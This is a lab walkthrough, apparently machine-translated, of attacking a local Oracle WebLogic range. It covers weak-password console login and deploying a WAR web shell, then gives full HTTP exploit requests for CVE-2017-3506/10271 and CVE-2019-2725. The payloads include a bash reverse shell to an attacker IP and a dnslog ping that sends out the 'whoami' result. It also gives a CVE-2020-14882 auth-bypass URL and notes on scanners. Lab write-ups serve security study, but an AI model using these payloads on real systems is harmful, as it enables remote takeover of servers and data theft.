Introduction
WebLogic is an application server produced by Oracle Corporation in the United States. To be precise, it is a middleware based on JAVAEE architecture. WebLogic is a Java application server for developing, integrating, deploying and managing large-scale distributed Web applications, network applications and database applications. Introduce the dynamic functions of Java and the security of Java Enterprise standard into the development, integration, deployment and management of large-scale network applications.
WebLogic is one of the main products of American Oracle, which was acquired through the acquisition of BEA. It is one of the main Java (J2EE) application server software (application server) in the commercial market, and it is the world's first successful commercialized J2EE application server, which has been released to version 12c(12.2.1.4). And this product also extends WebLogic Portal, WebLogic Integration and other enterprise middleware (but at present Oracle mainly replaces these enterprise packages other than WebLogic Server with Fusion Middleware fusion middleware), and OEPE(Oracle Enterprise Pack for Eclipse) development tool.
rce caused by weak password login
docker pull image
docker-compose up -d
Log in to port 7001
Splicing url http://192.168.3.108:7001/console
Weak password login
If the number of weak password errors exceeds five times, it will be locked, so use a weak password to log in here
Successfully logged in here
Make war package
Create a separate folder, which contains the jsp Trojan horse of Ice Scorpion 3
Open cmd and enter jar -cvf aaa.war .
Package the current directory into a war package
Upload war package
Click to deploy
I failed to connect to the Ice Scorpion here, so I re-uploaded a Godzilla one, and the steps are the same.
successfully connected.
CVE-2017-3506/10271 XMLDecoder deserialization vulnerability
Splice the following URL s, and if the echo is displayed as shown in the figure below, it can be judged that the wls-wsat component exists.
/wls-wsat/CoordinatorPortType /wls-wsat/RegistrationPortTypeRPC /wls-wsat/ParticipantPortType /wls-wsat/RegistrationRequesterPortType /wls-wsat/CoordinatorPortType11 /wls-wsat/RegistrationPortTypeRPC11 /wls-wsat/ParticipantPortType11 /wls-wsat/RegistrationRequesterPortType11
linux rebound shell
Refresh the packet capture page directly, and then modify the packet. This is the original packet. Then first change the GET type to POST type, and there is a function after right-clicking on burp that specifically converts the data packet format.
After changing to a POST-type data packet, some construction is required to successfully RCE. The Content-Type needs to be equal to text/xml, otherwise XMLDecoder may not parse it. The following is the constructed data package.
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.3.108:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: close Cookie: ADMINCONSOLESESSION=CsBPjQgJv12n5Gn6sHQhTXT74KQ0yrhXn0JC2XKlJqKY7bdsZqP4!-1250251804 Upgrade-Insecure-Requests: 1 Content-Type: text/xml Content-Length: 640 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i >& /dev/tcp/192.168.3.126/8888 0>&1</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
The picture below is the package after the above construction, and then put the package
This interface will appear after unpacking
Successfully rebound the shell
cve-2017-10271 and 3506 have the same vulnerability principle, except that 10271 bypasses the 3506 patch
CVE-2019-2725 wls-wsat deserialization remote code execution vulnerability
Vulnerability introduction:
This vulnerability is actually another entry of CVE-2017-10271. The patch of CVE-2017-3506 filters object; the patch of CVE-2017-10271 filters new and method tags, and void can only be followed by index and array. It can only follow the class of byte type; the patch of CVE-2019-2725 filters the class and limits the byte length in the array tag.
Affected components:
bea_wls9_async_response.war,wls-wsat.war
Sphere of influence:
10.3.6.0,12.1.3.0
Authentication vulnerability:
access /_async/AsyncResponseService,If it returns 200, it exists, and if it returns 404, it does not exist: /_async/AsyncResponseService /_async/AsyncResponseServiceJms /_async/AsyncResponseServiceHttps
Dnslog verify shell
Refresh directly to capture the packet, and then modify the data packet. Like the previous one, you need to convert the GET-type data packet into a POST-type data packet, and then modify the structure.
POST /_async/AsyncResponseService HTTP/1.1 Host: 192.168.3.108:7001 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Length: 859 Accept-Encoding: gzip, deflate SOAPAction: Accept: */* User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: keep-alive content-type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>ping `whoami`.tsqohg.dnslog.cn</string> </void> </array> <void method="start"/></void> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>
Use the package constructed above, and then send the package, 202 means successful execution
Received a message here, indicating that there is a vulnerability
CVE-2020-14882 Unauthorized access
Splice the following URL s to log in. If you can access successfully, it means that there is an unauthorized access vulnerability.
http://192.168.3.108:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29
tool use
xray
When using xray to scan, you need to scan the root directory directly. If you scan the vulnerability page directly, you will not be able to scan the vulnerability. However, there are many vulnerabilities in this shooting range. This scan is still not comprehensive. The following is the scanned page.
scan results
liqunkit
This tool is the same as the case of xray, directly accessing the vulnerability connection, it is impossible to scan out the vulnerability, and the root directory must be scanned.
The above is a scan of the vulnerable page, and there is no result.
The following is a scan of the root directory, with three results.
weblogicexploit
The tool only supports direct exploits.
connection succeeded
